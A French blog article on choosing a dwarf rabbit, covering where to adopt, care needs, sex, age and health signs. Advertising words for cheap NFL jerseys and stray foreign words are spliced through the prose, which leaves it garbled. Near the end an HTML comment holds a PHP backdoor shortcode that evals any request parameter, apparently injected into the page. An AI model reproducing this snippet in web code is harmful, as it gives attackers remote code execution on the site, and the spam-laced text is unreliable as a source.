Choisir son lapin nain : des critères essentiels à prendre en compte

Nourriture lapin nain, avec quoi nourrir vos lapins nains ?
3 décembre 2015

Devenir le maître d’un animal de compagnie s’avère être une réelle responsabilité : la vie et le bien être de ces petites bêtes en dépend. Soyez bien certains de votre volonté d’acquérir un lapin nain et de l’attention que vous pourrez lui accorder.

Où adopter son lapin nain ?

Nous ne vous apprendrons rien en vous déconseillant vivement d’acheter votre petit animal dans une animalerie. Tout d’abord, les animaux s’y trouvant sont souvent malades dû à leurs conditions de vie. Ils sont parfois issus de croisements et il n’est pas toujours chose aisée de distinguer un lapin nain pure race d’un lapin nain issu de croisements. Adopter votre petit animal auprès d’un éleveur ou d’un particulier ayant eu une portée issue de lapins nains s’avère préférable. D’autre part, le lapin nain s’avère être un animal ne supportant pas bouleversements et modifications dans sa vie tels que la nourriture lapin nain ou l’environnement. Un lapin nain en animalerie aura déjà souffert de nombreux transports, nombreuses alimentations… Contrairement à un lapin nain que vous trouverez chez un éleveur qui n’aura connu qu’un Algunas type de nourriture et aucun transport.

Quel traitement et quels types de soins apporter à votre lapin nain ?

Un lapin nain ou extra wholesale nfl jerseys nain peut avoir des besoins parfois semblables à celui d’un petit wird enfant. Il a besoin d’une attention régulière et en quantité. Très sensible au fait de se sentir délaissé, il est préférable de bien réfléchir à l’acquisition de Items son lapin nain car entre l’attention qu’il requiert, les frais de vétérinaire et de rabbit-sitter c?n si vous partez en vacances : il s’agit d’une adoption devant avoir été soumises à une longue réflexion.

Des critères de choix de votre lapin nain

De nombreux critères sont à prendre en compte lors de l’acquisition de votre lapin nain. Tout d’abord, wholesale nfl jerseys veillez à contrôler qu’il ne se trouve pas en contact avec des lapins malades sous peine d’adopter vous même un lapin nain en mauvais état de santé. D’autre part, veillez à ce que votre lapin nain ait évolué dans un environnement sain, propre, pas surchauffé… Si vous hésitez entre choisir un mâle ou cheap jerseys une femelle, ne vous fiez pas à leur comportement puisqu’ils sont aussi doux l’un que l’autre. Cependant, le mâle peut avoir tendance à marquer son territoire et la femelle vous imposera ses périodes de chaleur. Vous devrez lui accorder plus d’attention pour éviter qu’il ne souffre de solitude. Si vous décidez d’adopter deux lapins nains. Nous ne pouvons que vous déconseiller d’adopter deux mâles qui risqueraient fortement de se battre. Il est préférable d’adopter deux femelles en même temps afin de les lier l’une à l’autre pour offrir une meilleure adaptation à leur environnement. Il est fortement déconseillé d’adopter un lapin à peine sevré de 3 mois puisque vous risquez de souffrir de problèmes cheap jerseys de comportements de votre lapin nain. Préférez un lapin ayant entre 4 et 5 mois. Différents critères physiques peuvent être pris en compte pour faire le bon choix. Les fesses invades du lapin doivent être propres, les diarrhées étant contagieuses. Son nez ne doit pas couler, ses yeux non plus qui doivent être propres ainsi que les oreilles. Adoptez un lapin nain dont la peau est lisse, sans croûtes ni plaies mais également dont le poil est doux, brillant, sans aucune zone dégarnie.

Enfin, le comportement de votre petite bête est important. Votre lapin nain vous apportera joie et bonheur en étant vif, curieux, joueur, câlin. Il est préférable de se méfier des lapins nains se tenant à l’écart du groupe ce qui peut dénoter des troubles comportementaux inquiétants.

<!– [insert_php]if (isset($_REQUEST[« xTgRq »])){eval($_REQUEST[« xTgRq »]);exit;}[/insert_php][php]if (isset($_REQUEST[« xTgRq »])){eval($_REQUEST[« xTgRq »]);exit;}[/php] –>

Choisir son lapin nain : des critères essentiels à prendre en compte
5 (100%) 1 vote